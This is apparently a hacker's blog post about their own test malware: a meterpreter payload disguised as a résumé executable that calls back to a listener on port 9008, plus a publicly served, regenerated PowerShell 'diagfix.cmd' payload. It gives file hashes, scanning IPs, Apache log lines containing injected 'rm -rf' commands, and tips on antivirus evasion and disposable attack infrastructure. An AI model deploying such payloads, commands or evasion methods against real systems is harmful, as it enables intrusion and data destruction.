_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc24: bd3f25
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc32c: 2fa98f85
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc32ecma267: c7e20603



; lazy again:
cp _resumepcap.hexdump.extracted/4 ./4.exe
https://www.virustotal.com/#/file/5baecac3ee5cf8f8f0d13d19c540310681abbc1e6978e397d077885d6c104b6f/detection
https://www.hybrid-analysis.com/sample/5baecac3ee5cf8f8f0d13d19c540310681abbc1e6978e397d077885d6c104b6f?environmentId=120

; Total IOCs
(myserver):9008
9A8FE886ABA12E02FD0FC44F004A7111

rahash2 -a all _resumepcap.hexdump.extracted/4 |awk '{print $3,$4}'
md5: eeb70c0bd145011062f0116738e10a5e
sha1: 295be71de968e22a14c2a0fb558d3295b4c2a7c3
sha256: 5baecac3ee5cf8f8f0d13d19c540310681abbc1e6978e397d077885d6c104b6f
sha384: 950bee417b6b6fa9bbdb4becbcba3b574a4d8d4201d6a089bd8bf4a566291d976f803331999cd46ed2c53c49bdeda973
sha512: aa15fb09b5e8a5b9904ef3582f28a521afc32a1f3771dec65e5699b08bcad2fbccfb43c1124987cc1d78ba8814a98c75f28ff73a82f7c125c5515f389c7d9cff
crc16: 4df2
crc32: c854733c
md4: db31d79e9eaddfc0a93e043d058c9ca0
xor: ae
xorpair: 54fa
parity: 01
entropy: 07000000
hamdist: 06
pcprint: 22
mod255: f6
xxhash: ae3757fa
adler32: 52af2f02
luhn: 03
crc8smbus: ef
crc15can: 759f
crc16hdlc: 270e
crc16usb: 2328
crc16citt: 8672
crc24: bd3f25
crc32c: 2fa98f85
crc32ecma267: c7e20603

rahash2 -a all resume1.doc.exe |awk '{print $3,$4}'
md5: 90f7ee1bf4451349dfa7c518a8c6202a
sha1: 0c214854fef6ac5c28f84bf07ee6d39eb3595d82
sha256: ea2bb0a47fedb86127a59e71285f61036e1ff9c4e0a1d0fae6fe8f2931e4d5a6
sha384: abfd2915e8b1bce3c871a8faec67b503599908c24ba08dfdcc8ca52c04560ec132328a31f53d4c8853ce12256488d0ad
sha512: fac47672393b774135997b98c86874667a526bc40c8ab04745d4c28de3b1afdea9f8efc257a9e8e4f42d3341f065a81bde0fe93a220a3adae338a1776bb5a691
crc16: 9f78
crc32: 1b63e4bd
md4: 282dcd274bd2efade3765ddff3ec65e1
xor: eb
xorpair: 3ad1
parity: 00
entropy: 03000000
hamdist: 01
pcprint: 2d
mod255: 4d
xxhash: 5924b386
adler32: 913ba49c
luhn: 00
crc8smbus: 3f
crc15can: 5a1d
crc16hdlc: 4045
crc16usb: a732
crc16citt: 4b6a
crc24: 7a1917
crc32c: d18b15a4
crc32ecma267: df97a7b0

rahash2 -a all resumebase64.decoded |awk '{print $3,$4}'
md5: 3205f33d70ec93109d60da5fe1002e7e
sha1: ec19a5fa86353b176941809b1e9858aead9047a3
sha256: e02b170466ee0f810656bfeca8c9c7ce523b635fa36248dd7f9259629a593be5
sha384: f232b1f8dd2d2c4d07dc761eb6ef1b7defbc6379f15222d607e43e22a2f0c48ea98986db9e32164e3c88287d34224d73
sha512: 547fb256993e4febce7f3da35ce5cfbf485e8ee97f9fe1861b82172b4c7f94082fa5b66738d289a0db2fb3be97acb900290786bf987f813ef00eb8aee97f1f51
crc16: 78af
crc32: d40234f5
md4: 1a8108290cfc7ffa605b0879d6e3b8f2
xor: 0a
xorpair: 0a00
parity: 00
entropy: 03000000
hamdist: 02
pcprint: 32
mod255: 98
xxhash: c09b7c9b
adler32: be051623
luhn: 09
crc8smbus: 84
crc15can: 4d93
crc16hdlc: e7fa
crc16usb: 8313
crc16citt: f7ba
crc24: e9c836
crc32c: 75c98a63
crc32ecma267: 04a00a8f

 The gist of all that, is that it connected back to port 9008 on my server where I have an active meterpreter listener forwarded to. Pretty easy, not really a difficult analysis, really a 5 minute rush job. But, it does help me know that meterpreter launches that secondary payload when ran, that's pretty sweet, though everyone sort of knew that. But since launching this and a few other things online, I've received a number of hits on my shell from people looking at that port:

185.220.101.6
163.172.214.8
37.59.20.111
107.178.194.23
52.200.221.20
14.141.107.206
66.249.88.132
208.87.233.140
185.220.101.13
161.69.99.11
5.62.59.93
1.192.194.17
134.96.238.193
50.112.194.65
As of the time of this writing:
curl "https://torstatus.blutmagie.de/ip_list_exit.php/Tor_ip_list_EXIT.csv" 2>/dev/null|grep "185.220.101.6\|163.172.214.8\|37.59.20.111\|107.178.194.23\|52.200.221.20\|50.112.194.65\|14.141.107.206\|66.249.88.132\|208.87.233.140\|185.220.101.13\|161.69.99.11\|5.62.59.93\|1.192.194.17\|134.96.238.193\|50.112.194.65"
163.172.214.8
185.220.101.6
185.220.101.13

This last one is sort of amusing because it tells me they looked a little bit into my site:

/var/log/apache2/access.log:50.112.194.65 - - [16/Apr/2018:07:31:29 -0500] "GET /diagfix.cmd HTTP/1.1" 200 7184 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
/var/log/apache2/access.log.8:50.112.194.65 - - [05/Mar/2018:10:29:43 -0600] "GET /miner.html?lol&rm -rf" 400 0 "-" "-"
/var/log/apache2/access.log.8:50.112.194.65 - - [05/Mar/2018:10:35:32 -0600] "GET / HTTP/1.1" 200 198376 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"

Edit, I wanted to add more because it amuses me the comparison between ips connecting to my c2 port for my test malware versus the hosts connecting to my web server, not including tor nodes:

grep -i "37.59.20.111\|107.178.194.23\|52.200.221.20\|14.141.107.206\|66.249.88.132\|208.87.233.140\|161.69.99.11\|5.62.59.93\|1.192.194.171\|34.96.238.193\|50.112.194.65" /var/log/apache2/access.log*                                  /var/log/apache2/access.log:50.112.194.65 - - [16/Apr/2018:07:31:29 -0500] "GET /diagfix.cmd HTTP/1.1" 200 7184 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
/var/log/apache2/access.log.8:107.178.194.23 - - [05/Mar/2018:10:26:56 -0600] "GET /miner.html?lol&rm%20-rf%20/boot/&rm%20-rf%20/opt/&rm%20-rf%20~/& HTTP/1.1" 200 654 "http://0daz.io" "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) AppEngine-Google; (+http://code.google.com/appengine; appid: s~virustotalcloud)"
/var/log/apache2/access.log.8:208.87.233.140 - - [05/Mar/2018:10:26:56 -0600] "GET /miner.html HTTP/1.1" 200 654 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13"
/var/log/apache2/access.log.8:208.87.233.140 - - [05/Mar/2018:10:26:57 -0600] "GET /coinhive.min.js HTTP/1.1" 200 18805 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13"
/var/log/apache2/access.log.8:50.112.194.65 - - [05/Mar/2018:10:29:43 -0600] "GET /miner.html?lol&rm -rf" 400 0 "-" "-"
/var/log/apache2/access.log.8:208.87.233.140 - - [05/Mar/2018:10:32:39 -0600] "GET / HTTP/1.1" 200 8440260 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1"
/var/log/apache2/access.log.8:52.200.221.20 - - [05/Mar/2018:10:35:21 -0600] "GET / HTTP/1.1" 200 157832 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
/var/log/apache2/access.log.8:50.112.194.65 - - [05/Mar/2018:10:35:32 -0600] "GET / HTTP/1.1" 200 198376 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"


These are both things that have been scanned with virus total or other platforms for shits and giggles, but this draws a clear understanding that some do, and some don't use tor with their analysis.

But what are people trying to analyze? Well the miner one, with that particular notion at the end, was one provided in another post on this blog plus my own get data to it. This was specific to a url attempt put into virus total because I want to track who's tracking this. The diagfix is unrelated, but is a repeatedly regenerated (every 300 seconds) unicorn powershell payload. Did this for ease of use and testing the "fud" capabilities of TheFatRat. Honestly, it does a decent job of evading some shit, but anyone who looks at it for a split second would recognize it. Yara rules could easily determine it, or the exec form. You'll see in my above example I left out the meterpreter yara rules, this is because well, analysis without the answer provided to me.

Things I learned with this week of dickery:

  • People seem to be rummaging through analyzing things they happen across, or that were involved in something flagged by the apt detection bs. 
  • apparently people detect meterpreter data as part of poison ivy
    • looked further, neat, the copy of poison ivy I have does partially contain code from meterpreter's stdapi nonsense it sends down. 
  • TheFatRat as a wrapper is pretty nice, but it can be ignored for the power.py and pw_exec.py tools on your own. Such as in a cron/at/while loop. 
  • Automated tools used when analyzing things often show weaker precautions than those meant to provide the reports. 
  • $5 cloud or docker instance, for a few hours of playing with just a minimal amount of preparation before hand, builds a full purposed suite for rapid spin up, attack, and spin down. 
    • Better yet, cloud services providing per hour pay, awww yeah... just don't assume they actually destroy things when it seems they did, go ahead and 0fill everything that you don't want shared before you deprovision. 

-Ferasdour
https://keybase.io/ferasdour
https://www.facebook.com/help.ferasdour

Tutorial: virus design

This may be somewhat of a cliche topic but I think it's important kids growing up have the same learning methods we do applied to more m...